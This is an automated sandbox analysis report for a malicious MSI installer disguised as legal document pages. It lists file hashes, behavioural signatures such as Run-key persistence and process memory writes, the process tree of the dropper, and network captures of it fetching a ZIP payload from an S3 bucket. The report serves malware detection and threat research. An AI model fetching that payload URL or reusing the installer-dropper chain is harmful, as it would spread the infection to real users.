Analysis

  • max time kernel
    74s
  • max time network
    116s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    23-09-2021 13:37

General

  • Target

    FOLHAS-PAGINAS-ADVOCACIA.msi

  • Size

    2.8MB

  • MD5

    8446fedeadab37c667b02dd7e0fdac26

  • SHA1

    04e9d8f6301946ae9a9fef977a5424f722fd9435

  • SHA256

    f01cc28590e94c1af30ca919a93f2615285f6774f5fc6b7cd8f933fac3303203

  • SHA512

    bfad67c71ac19a608cf03f93c18adb6d8073cc1deba149e8c0763a851c29de4a27064e36fb7a32bc5ffa82af3d45723d4ae34250f21526ef1853d92ef5362df1

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 13 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 19 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\FOLHAS-PAGINAS-ADVOCACIA.msi
    1⤵
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1544
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:916
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 0EC9DF812EA027A8D9129985DE29F146
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      PID:1600
    • C:\Windows\Installer\MSI2AA7.tmp
      "C:\Windows\Installer\MSI2AA7.tmp" /DontWait "C:\Users\Admin\AppData\Roaming\Documentacao\Inportagem\N9O987TDS.exe"
      2⤵
      • Executes dropped EXE
      PID:1640
  • C:\Users\Admin\AppData\Roaming\Documentacao\Inportagem\N9O987TDS.exe
    "C:\Users\Admin\AppData\Roaming\Documentacao\Inportagem\N9O987TDS.exe"
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    PID:1768

Network

  • flag-us
    DNS
    intermediari.s3.us-east-2.amazonaws.com
    MsiExec.exe
    Remote address:
    8.8.8.8:53
    Request
    intermediari.s3.us-east-2.amazonaws.com
    IN A
    Response
    intermediari.s3.us-east-2.amazonaws.com
    IN CNAME
    s3-r-w.us-east-2.amazonaws.com
    s3-r-w.us-east-2.amazonaws.com
    IN A
    52.219.96.24
  • flag-us
    GET
    https://intermediari.s3.us-east-2.amazonaws.com/N9O987TDS.zip
    MsiExec.exe
    Remote address:
    52.219.96.24:443
    Request
    GET /N9O987TDS.zip HTTP/1.1
    Accept: */*
    User-Agent: AdvancedInstaller
    Host: intermediari.s3.us-east-2.amazonaws.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    x-amz-id-2: 1Uy4VdOdQEzkdsRbQLQdQ73Cahj7yaR2LqteplNQCJR81u1CdNNjO49wmGRuYB5y15ZfFIVbqSI=
    x-amz-request-id: EAZZ5NRG1GNT8EX3
    Date: Thu, 23 Sep 2021 13:37:48 GMT
    Last-Modified: Tue, 21 Sep 2021 21:09:36 GMT
    ETag: "bcb214ddae34849b9fe721cde898f644"
    Accept-Ranges: bytes
    Content-Type: application/zip
    Server: AmazonS3
    Content-Length: 9144960
  • 52.219.96.24:443
    intermediari.s3.us-east-2.amazonaws.com
    MsiExec.exe
    152 B
    3
  • 52.219.96.24:443
    https://intermediari.s3.us-east-2.amazonaws.com/N9O987TDS.zip
    tls, http
    MsiExec.exe
    149.8kB
    9.4MB
    3245
    6441

    HTTP Request

    GET https://intermediari.s3.us-east-2.amazonaws.com/N9O987TDS.zip

    HTTP Response

    200
  • 8.8.8.8:53
    intermediari.s3.us-east-2.amazonaws.com
    dns
    MsiExec.exe
    85 B
    122 B
    1
    1

    DNS Request

    intermediari.s3.us-east-2.amazonaws.com

    DNS Response

    52.219.96.24

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1544-54-0x000007FEFBA11000-0x000007FEFBA13000-memory.dmp

    Filesize

    8KB

  • memory/1600-57-0x00000000751D1000-0x00000000751D3000-memory.dmp

    Filesize

    8KB

  • memory/1640-85-0x0000000000340000-0x0000000000342000-memory.dmp

    Filesize

    8KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.